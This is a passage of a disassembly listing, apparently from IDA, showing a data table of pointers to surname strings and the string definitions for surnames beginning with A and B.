dd offset aHaviaras ; "Haviaras"
dd offset aHawkes ; "Hawkes"
dd offset aHayes ; "Hayes"
dd offset aHaynes ; "Haynes"
dd offset aHazlewood ; "Hazlewood"
dd offset aHeermans ; "Heermans"
dd offset aHeft ; "Heft"
dd offset aHeiland ; "Heiland"
dd offset aHellman ; "Hellman"
dd offset aHellmiss ; "Hellmiss"
dd offset aHelprin ; "Helprin"
dd offset aHemphill ; "Hemphill"
dd offset aHenery ; "Henery"
dd offset aHenrichs ; "Henrichs"
dd offset aHernandez ; "Hernandez"
dd offset aHerrera ; "Herrera"
dd offset aHester ; "Hester"
dd offset aHeubert ; "Heubert"
dd offset aHeyeck ; "Heyeck"
dd offset aHimmelfarb ; "Himmelfarb"
dd offset aHind ; "Hind"
dd offset aHirst ; "Hirst"
dd offset aHitchcock ; "Hitchcock"
dd offset aHoang ; "Hoang"
dd offset aHock ; "Hock"
dd offset aHoffer ; "Hoffer"
dd offset aHoffman ; "Hoffman"
dd offset aHokanson ; "Hokanson"
dd offset aHokoda ; "Hokoda"
dd offset aHolmes ; "Holmes"
dd offset aHoloien ; "Holoien"
dd offset aHolter ; "Holter"
dd offset aHolway ; "Holway"
dd offset aHolzman ; "Holzman"
dd offset aHooker ; "Hooker"
dd offset aHopkins ; "Hopkins"
dd offset aHorsley ; "Horsley"
dd offset aHoshida ; "Hoshida"
dd offset aHostage ; "Hostage"
dd offset aHottle ; "Hottle"
dd offset aHoward ; "Howard"
dd offset aHoy ; "Hoy"
dd offset aHuey ; "Huey"
dd offset aHuidekoper ; "Huidekoper"
dd offset aHungerford ; "Hungerford"
dd offset aHuntington ; "Huntington"
dd offset aHupp ; "Hupp"
dd offset aHurtubise ; "Hurtubise"
dd offset aHutchings ; "Hutchings"
dd offset aHyde ; "Hyde"
dd offset aIaquinta ; "Iaquinta"
dd offset aIchikawa ; "Ichikawa"
dd offset aIgarashi ; "Igarashi"
dd offset aInamura ; "Inamura"
dd offset aInniss ; "Inniss"
dd offset aIsaac ; "Isaac"
dd offset aIsaievych ; "Isaievych"
dd offset aIsbill ; "Isbill"
dd offset aIsserman ; "Isserman"
dd offset aIyer ; "Iyer"
dd offset aJacenko ; "Jacenko"
dd offset aJackson ; "Jackson"
dd offset aJagers ; "Jagers"
dd offset aJagger ; "Jagger"
dd offset aJagoe ; "Jagoe"
dd offset aJain ; "Jain"
dd offset aJamil ; "Jamil"
dd offset aJanjigian ; "Janjigian"
dd offset aJarnagin ; "Jarnagin"
dd offset aJarrell ; "Jarrell"
dd offset aJay ; "Jay"
dd offset aJeffers ; "Jeffers"
dd offset aJellis ; "Jellis"
dd offset aJenkins ; "Jenkins"
dd offset aJespersen ; "Jespersen"
dd offset aJewett ; "Jewett"
dd offset aJohannesson ; "Johannesson"
dd offset aJohannsen ; "Johannsen"
dd offset aJohns ; "Johns"
dd offset aJolly ; "Jolly"
dd offset aJorgensen ; "Jorgensen"
dd offset aJucks ; "Jucks"
dd offset aJuliano ; "Juliano"
dd offset aJulious ; "Julious"
dd offset aKabbash ; "Kabbash"
dd offset aKaboolian ; "Kaboolian"
dd offset aKafadar ; "Kafadar"
dd offset aKalbfleisch ; "Kalbfleisch"
dd offset aKaligian ; "Kaligian"
dd offset aKalil ; "Kalil"
dd offset aKalinowski ; "Kalinowski"
dd offset aKalman ; "Kalman"
dd offset aKamel ; "Kamel"
dd offset aKangis ; "Kangis"
dd offset aKarpouzes ; "Karpouzes"
dd offset aKassower ; "Kassower"
dd offset aKasten ; "Kasten"
dd offset aKawachi ; "Kawachi"
dd offset aKee ; "Kee"
dd offset aKeenan ; "Keenan"
dd offset aKeepper ; "Keepper"
dd offset aKeith ; "Keith"
dd offset aKelker ; "Kelker"
dd offset aKelsey ; "Kelsey"
dd offset aKempton ; "Kempton"
dd offset aKemsley ; "Kemsley"
dd offset aKendall ; "Kendall"
dd offset aKerry ; "Kerry"
dd offset aKeul ; "Keul"
dd offset aKhong ; "Khong"
dd offset aKimmel ; "Kimmel"
dd offset aKimmett ; "Kimmett"
dd offset aKimura ; "Kimura"
dd offset aKindall ; "Kindall"
dd offset aKinsley ; "Kinsley"
dd offset aKippenberger ; "Kippenberger"
dd offset aKirscht ; "Kirscht"
dd offset aKittridge ; "Kittridge"
dd offset aKleckner ; "Kleckner"
dd offset aKleiman ; "Kleiman"
dd offset aKleinfelder ; "Kleinfelder"
dd offset aKlemperer ; "Klemperer"
dd offset aKling ; "Kling"
dd offset aKlinkenborg ; "Klinkenborg"
dd offset aKlint ; "Klint"
dd offset aKnuff ; "Knuff"
dd offset aKobrick ; "Kobrick"
dd offset aKoch ; "Koch"
dd offset aKohn ; "Kohn"
dd offset aKoivumaki ; "Koivumaki"
dd offset aKommer ; "Kommer"
dd offset aKoniaris ; "Koniaris"
dd offset aKonrad ; "Konrad"
dd offset aKool ; "Kool"
dd offset aKorzybski ; "Korzybski"
dd offset aKotter ; "Kotter"
dd offset aKovaks ; "Kovaks"
dd offset aKraemer ; "Kraemer"
dd offset aKrailo ; "Krailo"
dd offset aKrasney ; "Krasney"
dd offset aKraus ; "Kraus"
dd offset aKroemer ; "Kroemer"
dd offset aKrysiak ; "Krysiak"
dd offset aKuenzli ; "Kuenzli"
dd offset aKumar ; "Kumar"
dd offset aKusman ; "Kusman"
dd offset aKuwabara ; "Kuwabara"
dd offset aLa ; "La"
dd offset aLabunka ; "Labunka"
dd offset aLafler ; "Lafler"
dd offset aLaing ; "Laing"
dd offset aLallemant ; "Lallemant"
dd offset aLandes ; "Landes"
dd offset aLankes ; "Lankes"
dd offset aLantieri ; "Lantieri"
dd offset aLanzit ; "Lanzit"
dd offset aLaserna ; "Laserna"
dd offset aLashley ; "Lashley"
dd offset aLawless ; "Lawless"
dd offset aLecar ; "Lecar"
dd offset aLecce ; "Lecce"
dd offset aLeclercq ; "Leclercq"
dd offset aLeite ; "Leite"
dd offset aLenard ; "Lenard"
dd offset aLEnclos ; "l'Enclos"
dd offset aLesser ; "Lesser"
dd offset aLessi ; "Lessi"
dd offset aLiakos ; "Liakos"
dd offset aLidano ; "Lidano"
dd offset aLiem ; "Liem"
dd offset aLight ; "Light"
dd offset aLightfoot ; "Lightfoot"
dd offset aLim ; "Lim"
dd offset aLinares ; "Linares"
dd offset aLinda ; "Linda"
dd offset aLinder ; "Linder"
dd offset aLine_0 ; "Line"
dd offset aLinehan ; "Linehan"
dd offset aLinzee ; "Linzee"
dd offset aLippmann ; "Lippmann"
dd offset aLipponen ; "Lipponen"
dd offset aLittle ; "Little"
dd offset aLitvak ; "Litvak"
dd offset aLivernash ; "Livernash"
dd offset aLivi ; "Livi"
dd offset aLivolsi ; "Livolsi"
dd offset aLizardo ; "Lizardo"
dd offset aLocatelli ; "Locatelli"
dd offset aLongworth ; "Longworth"
dd offset aLoss ; "Loss"
dd offset aLoveman ; "Loveman"
dd offset aLowenstein ; "Lowenstein"
dd offset aLoza ; "Loza"
dd offset aLubin ; "Lubin"
dd offset aLucas ; "Lucas"
dd offset aLuciano ; "Luciano"
dd offset aLuczkow ; "Luczkow"
dd offset aLuecke ; "Luecke"
dd offset aLunetta ; "Lunetta"
dd offset aLuoma ; "Luoma"
dd offset aLussier ; "Lussier"
dd offset aLutcavage ; "Lutcavage"
dd offset aLuzader ; "Luzader"
dd offset aMa ; "Ma"
dd offset aMaccormac ; "Maccormac"
dd offset aMacdonald ; "Macdonald"
dd offset aMaceachern ; "Maceachern"
dd offset aMacintyre ; "Macintyre"
dd offset aMackenney ; "Mackenney"
dd offset aMacmillan ; "MacMillan"
dd offset aMacy ; "Macy"
dd offset aMadigan ; "Madigan"
dd offset aMaggio ; "Maggio"
dd offset aMahony ; "Mahony"
dd offset aMaier ; "Maier"
dd offset aMaineHershey ; "Maine-Hershey"
dd offset aMaisano ; "Maisano"
dd offset aMalatesta ; "Malatesta"
dd offset aMaller ; "Maller"
dd offset aMalova ; "Malova"
dd offset aManalis ; "Manalis"
dd offset aMandel ; "Mandel"
dd offset aManganiello ; "Manganiello"
dd offset aMantovan ; "Mantovan"
dd offset aMarch_0 ; "March"
dd offset aMarchbanks ; "Marchbanks"
dd offset aMarcus ; "Marcus"
dd offset aMargalit ; "Margalit"
dd offset aMargetts ; "Margetts"
dd offset aMarques ; "Marques"
dd offset aMartinez ; "Martinez"
dd offset aMartochio ; "Martochio"
dd offset aMarton ; "Marton"
dd offset aMarubini ; "Marubini"
dd offset aMass ; "Mass"
dd offset aMatalka ; "Matalka"
dd offset aMatarazzo ; "Matarazzo"
dd offset aMatsukata ; "Matsukata"
dd offset aMattson ; "Mattson"
dd offset aMauzy ; "Mauzy"
dd offset aMay_0 ; "May"
dd offset aMazzali ; "Mazzali"
dd offset aMazziotta ; "Mazziotta"
dd offset aMcbride ; "Mcbride"
dd offset aMccaffery ; "Mccaffery"
dd offset aMccall ; "Mccall"
dd offset aMcclearn ; "Mcclearn"
dd offset aMcdowell ; "Mcdowell"
dd offset aMcelroy ; "Mcelroy"
dd offset aMcfadden ; "McFadden"
dd offset aMcghee ; "Mcghee"
dd offset aMcgoldrick ; "Mcgoldrick"
dd offset aMcilroy ; "McIlroy"
dd offset aMcintosh ; "Mcintosh"
dd offset aMckenna ; "Mckenna"
dd offset aMclane ; "Mclane"
dd offset aMclaren ; "Mclaren"
dd offset aMcnealy ; "Mcnealy"
dd offset aMcnulty ; "Mcnulty"
dd offset aMeccariello ; "Meccariello"
dd offset aMemisoglu ; "Memisoglu"
dd offset aMenzies ; "Menzies"
dd offset aMerikoski ; "Merikoski"
dd offset aMerlani ; "Merlani"
dd offset aMerminod ; "Merminod"
dd offset aMerseth ; "Merseth"
dd offset aMerz ; "Merz"
dd offset aMetelka ; "Metelka"
dd offset aMetropolis ; "Metropolis"
dd offset aMeurer ; "Meurer"
dd offset aMichelman ; "Michelman"
dd offset aMiddle ; "Middle"
dd offset aMieher ; "Mieher"
dd offset aMills ; "Mills"
dd offset aMinh ; "Minh"
dd offset aMini ; "Mini"
dd offset aMinichiello ; "Minichiello"
dd offset aGonzalez ; "Gonzalez"
dd offset aMitropoulos ; "Mitropoulos"
dd offset aMittal ; "Mittal"
dd offset aMocroft ; "Mocroft"
dd offset aModestino ; "Modestino"
dd offset aMoeller ; "Moeller"
dd offset aMohr ; "Mohr"
dd offset aMoiamedi ; "Moiamedi"
dd offset aMonque ; "Monque"
dd offset aMontilio ; "Montilio"
dd offset aMooredech_ ; "MooreDeCh."
dd offset aMorani ; "Morani"
dd offset aMoreton ; "Moreton"
dd offset aMorrison ; "Morrison"
dd offset aMorrow ; "Morrow"
dd offset aMortimer ; "Mortimer"
dd offset aMosher ; "Mosher"
dd offset aMosler ; "Mosler"
dd offset aMostafavi ; "Mostafavi"
dd offset aMotooka ; "Motooka"
dd offset aMudarri ; "Mudarri"
dd offset aMuello ; "Muello"
dd offset aMugnai ; "Mugnai"
dd offset aMulkern ; "Mulkern"
dd offset aMulroy ; "Mulroy"
dd offset aMumford ; "Mumford"
dd offset aMussachio ; "Mussachio"
dd offset aNaddeo ; "Naddeo"
dd offset aNapolitano ; "Napolitano"
dd offset aNardi ; "Nardi"
dd offset aNardone ; "Nardone"
dd offset aNaviaux ; "Naviaux"
dd offset aNayduch ; "Nayduch"
dd offset aNelson ; "Nelson"
dd offset aNenna ; "Nenna"
dd offset aNesci ; "Nesci"
dd offset aNeuman ; "Neuman"
dd offset aNewfeld ; "Newfeld"
dd offset aNewlin ; "Newlin"
dd offset aNg ; "Ng"
dd offset aNi_0 ; "Ni"
dd offset aNickerson ; "Nickerson"
dd offset aNickoloff ; "Nickoloff"
dd offset aNisenson ; "Nisenson"
dd offset aNitabach ; "Nitabach"
dd offset aNotman ; "Notman"
dd offset aNuzum ; "Nuzum"
dd offset aOcougne ; "Ocougne"
dd offset aOgata ; "Ogata"
dd offset aOh ; "Oh"
dd offset aOHagan ; "O'hagan"
dd offset aOldford ; "Oldford"
dd offset aOlsen ; "Olsen"
dd offset aOlson ; "Olson"
dd offset aOlszewski ; "Olszewski"
dd offset aOMalley ; "O'malley"
dd offset aOman ; "Oman"
dd offset aOMeara ; "O'meara"
dd offset aOpel ; "Opel"
dd offset aOray ; "Oray"
dd offset aOrfield ; "Orfield"
dd offset aOrsi ; "Orsi"
dd offset aOspina ; "Ospina"
dd offset aOstrowski ; "Ostrowski"
dd offset aOttaviani ; "Ottaviani"
dd offset aOtten ; "Otten"
dd offset aOuchida ; "Ouchida"
dd offset aOvid ; "Ovid"
dd offset aPaesdealmeida ; "PaesDealmeida"
dd offset aPaine ; "Paine"
dd offset aPalayoor ; "Palayoor"
dd offset aPalepu ; "Palepu"
dd offset aPallara ; "Pallara"
dd offset aPalmitesta ; "Palmitesta"
dd offset aPanadero ; "Panadero"
dd offset aPanizzon ; "Panizzon"
dd offset aPantilla ; "Pantilla"
dd offset aPaoletti ; "Paoletti"
dd offset aParmeggiani ; "Parmeggiani"
dd offset aParris ; "Parris"
dd offset aPartridge ; "Partridge"
dd offset aPascucci ; "Pascucci"
dd offset aPatefield ; "Patefield"
dd offset aPatrick ; "Patrick"
dd offset aPattullo ; "Pattullo"
dd offset aPavetti ; "Pavetti"
dd offset aPavlon ; "Pavlon"
dd offset aPawloski ; "Pawloski"
dd offset aPaynter ; "Paynter"
dd offset aPeabody ; "Peabody"
dd offset aPearlberg ; "Pearlberg"
dd offset aPederson ; "Pederson"
dd offset aPeishel ; "Peishel"
dd offset aPenny ; "Penny"
dd offset aPereira ; "Pereira"
dd offset aPerko ; "Perko"
dd offset aPerlak ; "Perlak"
dd offset aPerlman ; "Perlman"
dd offset aPerna ; "Perna"
dd offset aPerone ; "Perone"
dd offset aPerrimon ; "Perrimon"
dd offset aPeters ; "Peters"
dd offset aPetruzello ; "Petruzello"
dd offset aPettibone ; "Pettibone"
dd offset aPettit ; "Pettit"
dd offset aPfister ; "Pfister"
dd offset aPilbeam ; "Pilbeam"
dd offset aPinot ; "Pinot"
dd offset aPlancon ; "Plancon"
dd offset aPlant ; "Plant"
dd offset aPlasket ; "Plasket"
dd offset aPlous ; "Plous"
dd offset aPo ; "Po"
dd offset aPocobene ; "Pocobene"
dd offset aPoincaire ; "Poincaire"
dd offset aPointer ; "Pointer"
dd offset aPoirier ; "Poirier"
dd offset aPolak ; "Polak"
dd offset aPolanyi ; "Polanyi"
dd offset aPolitis ; "Politis"
dd offset aPoma ; "Poma"
dd offset aPoolman ; "Poolman"
dd offset aPowers ; "Powers"
dd offset aPresper ; "Presper"
dd offset aPreucel ; "Preucel"
dd offset aPrevost ; "Prevost"
dd offset aPritchard ; "Pritchard"
dd offset aPritz ; "Pritz"
dd offset aProietti ; "Proietti"
dd offset aProthrowStith ; "Prothrow-Stith"
dd offset aPuccia ; "Puccia"
dd offset aPugh ; "Pugh"
dd offset aPynchon ; "Pynchon"
dd offset aQuaday ; "Quaday"
dd offset aQuetin ; "Quetin"
dd offset aRabe ; "Rabe"
dd offset aRabkin ; "Rabkin"
dd offset aRadeke ; "Radeke"
dd offset aRajagopalan ; "Rajagopalan"
dd offset aRaney ; "Raney"
dd offset aRangan ; "Rangan"
dd offset aRankin ; "Rankin"
dd offset aRapple ; "Rapple"
dd offset aRayport ; "Rayport"
dd offset aReddenTyler ; "Redden-Tyler"
dd offset aReedquist ; "Reedquist"
dd offset aCunningham ; "Cunningham"
dd offset aReinold ; "Reinold"
dd offset aRemak ; "Remak"
dd offset aRenick ; "Renick"
dd offset aRepetto ; "Repetto"
dd offset aResnik ; "Resnik"
dd offset aRhea ; "Rhea"
dd offset aRichmond ; "Richmond"
dd offset aRielly ; "Rielly"
dd offset aRindos ; "Rindos"
dd offset aRineer ; "Rineer"
dd offset aRish ; "Rish"
dd offset aRivera ; "Rivera"
dd offset aRobinson ; "Robinson"
dd offset aRocha ; "Rocha"
dd offset aRoesler ; "Roesler"
dd offset aRogers ; "Rogers"
dd offset aRonen ; "Ronen"
dd offset aRow ; "Row"
dd offset aRoyal ; "Royal"
dd offset aRu ; "Ru"
dd offset aRuan ; "Ruan"
dd offset aRuderman ; "Ruderman"
dd offset aRuescher ; "Ruescher"
dd offset aRush ; "Rush"
dd offset aRyu ; "Ryu"
dd offset aSabatello ; "Sabatello"
dd offset aSadler ; "Sadler"
dd offset aSafire ; "Safire"
dd offset aSahu ; "Sahu"
dd offset aSali ; "Sali"
dd offset aSamson ; "Samson"
dd offset aSanchezRamirez ; "Sanchez-Ramirez"
dd offset aSanna ; "Sanna"
dd offset aSapers ; "Sapers"
dd offset aSarin ; "Sarin"
dd offset aSartore ; "Sartore"
dd offset aSase ; "Sase"
dd offset aSatin ; "Satin"
dd offset aSatta ; "Satta"
dd offset aSatterthwaite ; "Satterthwaite"
dd offset aSawtell ; "Sawtell"
dd offset aSayied ; "Sayied"
dd offset aScarponi ; "Scarponi"
dd offset aScepan ; "Scepan"
dd offset aScharf ; "Scharf"
dd offset aScharlemann ; "Scharlemann"
dd offset aScheiner ; "Scheiner"
dd offset aSchiano ; "Schiano"
dd offset aSchifini ; "Schifini"
dd offset aSchilling ; "Schilling"
dd offset aSchmitt ; "Schmitt"
dd offset aSchossberger ; "Schossberger"
dd offset aSchuman ; "Schuman"
dd offset aSchutte ; "Schutte"
dd offset aSchuyler ; "Schuyler"
dd offset aSchwan ; "Schwan"
dd offset aSchwickrath ; "Schwickrath"
dd offset aScovel ; "Scovel"
dd offset aScudder ; "Scudder"
dd offset aSeaton ; "Seaton"
dd offset aSeeber ; "Seeber"
dd offset aSegal ; "Segal"
dd offset aSekler ; "Sekler"
dd offset aSelvage ; "Selvage"
dd offset aSen ; "Sen"
dd offset aSennett ; "Sennett"
dd offset aSeterdahl ; "Seterdahl"
dd offset aSexton ; "Sexton"
dd offset aSeyfert ; "Seyfert"
dd offset aShaikh ; "Shaikh"
dd offset aShakis ; "Shakis"
dd offset aShankland ; "Shankland"
dd offset aShanley ; "Shanley"
dd offset aShar ; "Shar"
dd offset aShatrov ; "Shatrov"
dd offset aShavelson ; "Shavelson"
dd offset aShea ; "Shea"
dd offset aSheats ; "Sheats"
dd offset aShepherd ; "Shepherd"
dd offset aSheppard ; "Sheppard"
dd offset aShepstone ; "Shepstone"
dd offset aShesko ; "Shesko"
dd offset aShia ; "Shia"
dd offset aShibata ; "Shibata"
dd offset aShimon ; "Shimon"
dd offset aSiesto ; "Siesto"
dd offset aSigalot ; "Sigalot"
dd offset aSigini ; "Sigini"
dd offset aSigna ; "Signa"
dd offset aSilverman ; "Silverman"
dd offset aSilvetti ; "Silvetti"
dd offset aSinsabaugh ; "Sinsabaugh"
dd offset aSirilli ; "Sirilli"
dd offset aSites ; "Sites"
dd offset aSkane ; "Skane"
dd offset aSkerry ; "Skerry"
dd offset aSkoda ; "Skoda"
dd offset aSloan ; "Sloan"
dd offset aSlowe ; "Slowe"
dd offset aSmilow ; "Smilow"
dd offset aSniffen ; "Sniffen"
dd offset aSnodgrass ; "Snodgrass"
dd offset aSocolow ; "Socolow"
dd offset aSolon ; "Solon"
dd offset aSomers ; "Somers"
dd offset aSommariva ; "Sommariva"
dd offset aSorabella ; "Sorabella"
dd offset aSorg ; "Sorg"
dd offset aSottak ; "Sottak"
dd offset aSoukup ; "Soukup"
dd offset aSoule ; "Soule"
dd offset aSoultanian ; "Soultanian"
dd offset aSpanier ; "Spanier"
dd offset aSparrow ; "Sparrow"
dd offset aSpaulding ; "Spaulding"
dd offset aSpeizer ; "Speizer"
dd offset aSpence ; "Spence"
dd offset aSperber ; "Sperber"
dd offset aSpicer ; "Spicer"
dd offset aSpiegelhalter ; "Spiegelhalter"
dd offset aSpiliotis ; "Spiliotis"
dd offset aSpinrad ; "Spinrad"
dd offset aStmartin ; "StMartin"
dd offset aStalvey ; "Stalvey"
dd offset aStam ; "Stam"
dd offset aStang ; "Stang"
dd offset aStassinopolus ; "Stassinopolus"
dd offset aStates ; "States"
dd offset aStatlender ; "Statlender"
dd offset aStefani ; "Stefani"
dd offset aSteiner ; "Steiner"
dd offset aStephanian ; "Stephanian"
dd offset aStepniewska ; "Stepniewska"
dd offset aStewartOaten ; "Stewart-Oaten"
dd offset aStiepock ; "Stiepock"
dd offset aStillwell ; "Stillwell"
dd offset aStock ; "Stock"
dd offset aStockton ; "Stockton"
dd offset aStockwell ; "Stockwell"
dd offset aStolzenberg ; "Stolzenberg"
dd offset aStonich ; "Stonich"
dd offset aStorer ; "Storer"
dd offset aStott ; "Stott"
dd offset aStrange ; "Strange"
dd offset aStrauch ; "Strauch"
dd offset aStreiff ; "Streiff"
dd offset aStringer ; "Stringer"
dd offset aSullivan ; "Sullivan"
dd offset aSumner ; "Sumner"
dd offset aSuo ; "Suo"
dd offset aSurdam ; "Surdam"
dd offset aSweeting ; "Sweeting"
dd offset aSweetser ; "Sweetser"
dd offset aSwindle ; "Swindle"
dd offset aTagiuri ; "Tagiuri"
dd offset aTai ; "Tai"
dd offset aTalaugon ; "Talaugon"
dd offset aTambiah ; "Tambiah"
dd offset aTandler ; "Tandler"
dd offset aTanowitz ; "Tanowitz"
dd offset aTatar ; "Tatar"
dd offset aTaveras ; "Taveras"
dd offset aTawn ; "Tawn"
dd offset aTcherepnin ; "Tcherepnin"
dd offset aTeague ; "Teague"
dd offset aTemes ; "Temes"
dd offset aTemmer ; "Temmer"
dd offset aTenney ; "Tenney"
dd offset aTerracini ; "Terracini"
dd offset aThan ; "Than"
dd offset aThavaneswaran ; "Thavaneswaran"
dd offset aTheodos ; "Theodos"
dd offset aThibault ; "Thibault"
dd offset aThisted ; "Thisted"
dd offset aThomsen ; "Thomsen"
dd offset aThroop ; "Throop"
dd offset aTierney ; "Tierney"
dd offset aTill ; "Till"
dd offset aTimmons ; "Timmons"
dd offset aTofallis ; "Tofallis"
dd offset aTollestrup ; "Tollestrup"
dd offset aTolls ; "Tolls"
dd offset aTolman ; "Tolman"
dd offset aTomford ; "Tomford"
dd offset aToomer ; "Toomer"
dd offset aTopulos ; "Topulos"
dd offset aTorresi ; "Torresi"
dd offset aTorske ; "Torske"
dd offset aTowler ; "Towler"
dd offset aToye ; "Toye"
dd offset aTraebert ; "Traebert"
dd offset aTrenga ; "Trenga"
dd offset aTrewin ; "Trewin"
dd offset aTringali ; "Tringali"
dd offset aTroiani ; "Troiani"
dd offset aTroy ; "Troy"
dd offset aTruss ; "Truss"
dd offset aTsiatis ; "Tsiatis"
dd offset aTsomides ; "Tsomides"
dd offset aTsukurov ; "Tsukurov"
dd offset aTuck ; "Tuck"
dd offset aTudge ; "Tudge"
dd offset aTukan ; "Tukan"
dd offset aTurano ; "Turano"
dd offset aTurek ; "Turek"
dd offset aTuttle ; "Tuttle"
dd offset aTwells ; "Twells"
dd offset aTzamarias ; "Tzamarias"
dd offset aUllman ; "Ullman"
dd offset aUntermeyer ; "Untermeyer"
dd offset aUpsdell ; "Upsdell"
dd offset aUrban ; "Urban"
dd offset aUrdangBrown ; "Urdang-Brown"
dd offset aUsdan ; "Usdan"
dd offset aUzuner ; "Uzuner"
dd offset aVacca ; "Vacca"
dd offset aWaite ; "Waite"
dd offset aValberg ; "Valberg"
dd offset aValencia ; "Valencia"
dd offset aWales ; "Wales"
dd offset aWallenberg ; "Wallenberg"
dd offset aWalter ; "Walter"
dd offset aVanallen ; "vanAllen"
dd offset aVanzwet ; "VanZwet"
dd offset aVandenberg ; "Vandenberg"
dd offset aVanheeckeren ; "Vanheeckeren"
dd offset aWarshafsky ; "Warshafsky"
dd offset aWasowska ; "Wasowska"
dd offset aVasquez ; "Vasquez"
dd offset aWaugh ; "Waugh"
dd offset aWeighart ; "Weighart"
dd offset aWeingarten ; "Weingarten"
dd offset aWeinhaus ; "Weinhaus"
dd offset aWeissbourd ; "Weissbourd"
dd offset aWeissman ; "Weissman"
dd offset aVelasquez ; "Velasquez"
dd offset aWelles ; "Welles"
dd offset aWelsh ; "Welsh"
dd offset aWengret ; "Wengret"
dd offset aVenne ; "Venne"
dd offset aVerghese ; "Verghese"
dd offset aWescott ; "Wescott"
dd offset aWetzel ; "Wetzel"
dd offset aWhately ; "Whately"
dd offset aWhilton ; "Whilton"
dd offset aWhite ; "White"
dd offset aWhitla ; "Whitla"
dd offset aWhittaker ; "Whittaker"
dd offset aViana ; "Viana"
dd offset aViano ; "Viano"
dd offset aWiedersheim ; "Wiedersheim"
dd offset aWiener ; "Wiener"
dd offset aViens ; "Viens"
dd offset aVignola ; "Vignola"
dd offset aWilder ; "Wilder"
dd offset aWilhelm ; "Wilhelm"
dd offset aWilk ; "Wilk"
dd offset aWilkin ; "Wilkin"
dd offset aWilkinson ; "Wilkinson"
dd offset aVillarreal ; "Villarreal"
dd offset aWillstatter ; "Willstatter"
dd offset aWilson ; "Wilson"
dd offset aVitali ; "Vitali"
dd offset aViviani ; "Viviani"
dd offset aVoigt ; "Voigt"
dd offset aWolk ; "Wolk"
dd offset aVonhoffman ; "VonHoffman"
dd offset aWoo ; "Woo"
dd offset aWooden ; "Wooden"
dd offset aWoods ; "Woods"
dd offset aWoodsPowell ; "Woods-Powell"
dd offset aVorhaus ; "Vorhaus"
dd offset aVotey ; "Votey"
dd offset aYacono ; "Yacono"
dd offset aYamane ; "Yamane"
dd offset aYankee ; "Yankee"
dd offset aYarchuk ; "Yarchuk"
dd offset aYates ; "Yates"
dd offset aYbarra ; "Ybarra"
dd offset aYedidia ; "Yedidia"
dd offset aYesson ; "Yesson"
dd offset aYetiv ; "Yetiv"
dd offset aYoffe ; "Yoffe"
dd offset aYoo ; "Yoo"
dd offset aYoukSee ; "Youk-See"
dd offset aYu ; "Yu"
dd offset aZachary ; "Zachary"
dd offset aZahedi ; "Zahedi"
dd offset aZangwill ; "Zangwill"
dd offset aZegans ; "Zegans"
dd offset aZerbini ; "Zerbini"
dd offset aZoldak ; "Zoldak"
dd offset aZucconi ; "Zucconi"
dd offset aZurn ; "Zurn"
dd offset aZwiers ; "Zwiers"
dd offset aZytowski ; "Zytowski"
aAbdulrazak db 'Abdulrazak',0 ; DATA XREF: .data:off_4453E0�o
align 4
aAckerman db 'Ackerman',0 ; DATA XREF: .data:004453E4�o
align 4
aAdams db 'Adams',0 ; DATA XREF: .data:004453E8�o
align 4
aAddison db 'Addison',0 ; DATA XREF: .data:off_4453EC�o
aAdelstein db 'Adelstein',0 ; DATA XREF: .data:004453F0�o
align 10h
aAdibe db 'Adibe',0 ; DATA XREF: .data:004453F4�o
align 4
aAdorno db 'Adorno',0 ; DATA XREF: .data:004453F8�o
align 10h
aAhlers db 'Ahlers',0 ; DATA XREF: .data:004453FC�o
align 4
aAlavi db 'Alavi',0 ; DATA XREF: .data:00445400�o
align 10h
aAlcorn db 'Alcorn',0 ; DATA XREF: .data:00445404�o
align 4
aAlda db 'Alda',0 ; DATA XREF: .data:00445408�o
align 10h
aAleks db 'Aleks',0 ; DATA XREF: .data:0044540C�o
align 4
aAllison db 'Allison',0 ; DATA XREF: .data:00445410�o
aAlongi db 'Alongi',0 ; DATA XREF: .data:00445414�o
align 4
aAltavilla db 'Altavilla',0 ; DATA XREF: .data:00445418�o
align 4
aAltenberger db 'Altenberger',0 ; DATA XREF: .data:0044541C�o
aAltenhofen db 'Altenhofen',0 ; DATA XREF: .data:00445420�o
align 4
aAmaral db 'Amaral',0 ; DATA XREF: .data:00445424�o
align 4
aAmatangelo db 'Amatangelo',0 ; DATA XREF: .data:00445428�o
align 10h
aAmeer db 'Ameer',0 ; DATA XREF: .data:0044542C�o
align 4
aAmsden db 'Amsden',0 ; DATA XREF: .data:00445430�o
align 10h
aAnand db 'Anand',0 ; DATA XREF: .data:00445434�o
align 4
aAndel db 'Andel',0 ; DATA XREF: .data:00445438�o
align 10h
aAndo db 'Ando',0 ; DATA XREF: .data:0044543C�o
align 4
aAndrelus db 'Andrelus',0 ; DATA XREF: .data:00445440�o
align 4
aAndron db 'Andron',0 ; DATA XREF: .data:00445444�o
align 4
aAnfinrud db 'Anfinrud',0 ; DATA XREF: .data:00445448�o
align 4
aAnsley db 'Ansley',0 ; DATA XREF: .data:0044544C�o
align 10h
aAnthony db 'Anthony',0 ; DATA XREF: .data:00445450�o
aAntos db 'Antos',0 ; DATA XREF: .data:00445454�o
align 10h
aArbia db 'Arbia',0 ; DATA XREF: .data:00445458�o
align 4
aArduini db 'Arduini',0 ; DATA XREF: .data:0044545C�o
aArellano db 'Arellano',0 ; DATA XREF: .data:00445460�o
align 4
aAristotle db 'Aristotle',0 ; DATA XREF: .data:00445464�o
align 4
aArjas db 'Arjas',0 ; DATA XREF: .data:00445468�o
align 10h
aArky db 'Arky',0 ; DATA XREF: .data:0044546C�o
align 4
aAtkins db 'Atkins',0 ; DATA XREF: .data:00445470�o
align 10h
aAugustus db 'Augustus',0 ; DATA XREF: .data:00445474�o
align 4
aAurelius db 'Aurelius',0 ; DATA XREF: .data:00445478�o
align 4
aAxelrod db 'Axelrod',0 ; DATA XREF: .data:0044547C�o
aAxworthy db 'Axworthy',0 ; DATA XREF: .data:00445480�o
align 4
aAyiemba db 'Ayiemba',0 ; DATA XREF: .data:00445484�o
aAykroyd db 'Aykroyd',0 ; DATA XREF: .data:00445488�o
aAyling db 'Ayling',0 ; DATA XREF: .data:0044548C�o
align 4
aAzima db 'Azima',0 ; DATA XREF: .data:00445490�o
align 4
aBachmuth db 'Bachmuth',0 ; DATA XREF: .data:00445494�o
align 4
aBackus db 'Backus',0 ; DATA XREF: .data:00445498�o
align 10h
aBady db 'Bady',0 ; DATA XREF: .data:0044549C�o
align 4
aBaglivo db 'Baglivo',0 ; DATA XREF: .data:004454A0�o
aBagnold db 'Bagnold',0 ; DATA XREF: .data:004454A4�o
aBailar db 'Bailar',0 ; DATA XREF: .data:004454A8�o
align 10h
